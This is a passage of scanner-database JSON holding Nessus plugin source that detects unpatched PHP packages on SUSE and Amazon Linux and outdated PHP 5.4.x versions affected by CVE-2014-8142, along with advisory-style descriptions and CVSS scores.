reference:\"php5-sysvsem-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvsem-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvshm-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-sysvshm-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tidy-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tidy-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tokenizer-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-tokenizer-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-wddx-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-wddx-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlreader-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlreader-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlrpc-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlrpc-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlwriter-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xmlwriter-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xsl-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-xsl-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zip-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zip-debuginfo-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zlib-5.4.20-38.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"php5-zlib-debuginfo-5.4.20-38.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.2\", reference:\"apache2-mod_php5-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"apache2-mod_php5-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bcmath-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bcmath-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bz2-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-bz2-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-calendar-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-calendar-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ctype-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ctype-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-curl-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-curl-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dba-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dba-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-debugsource-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-devel-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dom-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-dom-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-enchant-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-enchant-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", 
reference:\"php5-exif-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-exif-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fastcgi-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fastcgi-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fileinfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fileinfo-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-firebird-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-firebird-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fpm-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-fpm-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ftp-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ftp-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gd-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gd-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gettext-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gettext-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gmp-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-gmp-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-iconv-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-iconv-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-imap-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-imap-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-intl-5.6.1-8.1\") ) 
flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-intl-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-json-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-json-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ldap-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-ldap-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mbstring-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mbstring-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mcrypt-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mcrypt-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mssql-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mssql-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mysql-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-mysql-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-odbc-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-odbc-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-opcache-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-opcache-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-openssl-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-openssl-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pcntl-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pcntl-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pdo-5.6.1-8.1\") ) flag++;\nif ( 
rpm_check(release:\"SUSE13.2\", reference:\"php5-pdo-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pear-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pgsql-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pgsql-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-phar-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-phar-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-posix-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-posix-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pspell-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-pspell-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-readline-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-readline-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-shmop-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-shmop-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-snmp-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-snmp-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-soap-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-soap-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sockets-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sockets-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sqlite-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sqlite-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", 
reference:\"php5-suhosin-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-suhosin-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvmsg-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvmsg-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvsem-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvsem-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvshm-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-sysvshm-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tidy-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tidy-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tokenizer-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-tokenizer-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-wddx-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-wddx-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlreader-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlreader-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlrpc-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlrpc-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlwriter-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xmlwriter-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xsl-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-xsl-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", 
reference:\"php5-zip-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zip-debuginfo-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zlib-5.6.1-8.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"php5-zlib-debuginfo-5.6.1-8.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php5 / apache2-mod_php5-debuginfo / php5 / php5-bcmath / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:20:32", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP 5.4.x installed on the\nremote host is prior to 5.4.36. It is, therefore, affected by a\nuse-after-free error in the 'process_nested_data' function within\n'ext/standard/var_unserializer.re' due to improper handling of\nduplicate keys within the serialized properties of an object. 
A remote\nattacker, using a specially crafted call to the 'unserialize' method,\ncan exploit this flaw to execute arbitrary code on the system.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application's self-reported version number.", "modified": "2018-07-24T00:00:00", "published": "2015-01-02T00:00:00", "id": "PHP_5_4_36.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80330", "title": "PHP 5.4.x < 5.4.36 'process_nested_data' RCE", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80330);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_bugtraq_id(71791);\n\n script_name(english:\"PHP 5.4.x < 5.4.36 'process_nested_data' RCE\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP 5.4.x installed on the\nremote host is prior to 5.4.36. It is, therefore, affected by a\nuse-after-free error in the 'process_nested_data' function within\n'ext/standard/var_unserializer.re' due to improper handling of\nduplicate keys within the serialized properties of an object. 
A remote\nattacker, using a specially crafted call to the 'unserialize' method,\ncan exploit this flaw to execute arbitrary code on the system.\n\nNote that Nessus has not attempted to exploit this issue but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.4.36\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.php.net/bug.php?id=68594\");\n # https://bugzilla.redhat.com/show_bug.cgi?id=1175718\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?88c4ed71\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to PHP version 5.4.36 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n 
port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.4)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.4\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.4.x\", port);\n\nif (version =~ \"^5\\.4\\.([0-9]|[12][0-9]|3[0-5])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version +\n '\\n Fixed version : 5.4.36' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-16T20:20:34", "bulletinFamily": "scanner", "description": "Use-after-free vulnerability in the process_nested_data function in\next/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before\n5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute\narbitrary code via a crafted unserialize call that leverages improper\nhandling of duplicate keys within the serialized properties of an\nobject, a different vulnerability than CVE-2004-1019 .", "modified": "2018-04-18T00:00:00", "published": "2015-01-09T00:00:00", "id": "ALA_ALAS-2015-464.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80415", "title": "Amazon Linux AMI : php55 (ALAS-2015-464)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-464.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80415);\n script_version(\"1.7\");\n 
script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2014-8142\");\n script_xref(name:\"ALAS\", value:\"2015-464\");\n\n script_name(english:\"Amazon Linux AMI : php55 (ALAS-2015-464)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Use-after-free vulnerability in the process_nested_data function in\next/standard/var_unserializer.re in PHP before 5.4.36, 5.5.x before\n5.5.20, and 5.6.x before 5.6.4 allows remote attackers to execute\narbitrary code via a crafted unserialize call that leverages improper\nhandling of duplicate keys within the serialized properties of an\nobject, a different vulnerability than CVE-2004-1019 .\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-464.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php55' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-embedded\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:php55-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-xmlrpc\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php55-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-bcmath-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-cli-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-common-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-dba-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-debuginfo-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-devel-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 
reference:\"php55-embedded-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-enchant-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-fpm-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-gd-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-gmp-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-imap-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-intl-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-ldap-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mbstring-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mcrypt-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mssql-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mysqlnd-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-odbc-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-opcache-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pdo-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pgsql-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-process-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pspell-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-recode-5.5.20-2.94.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", 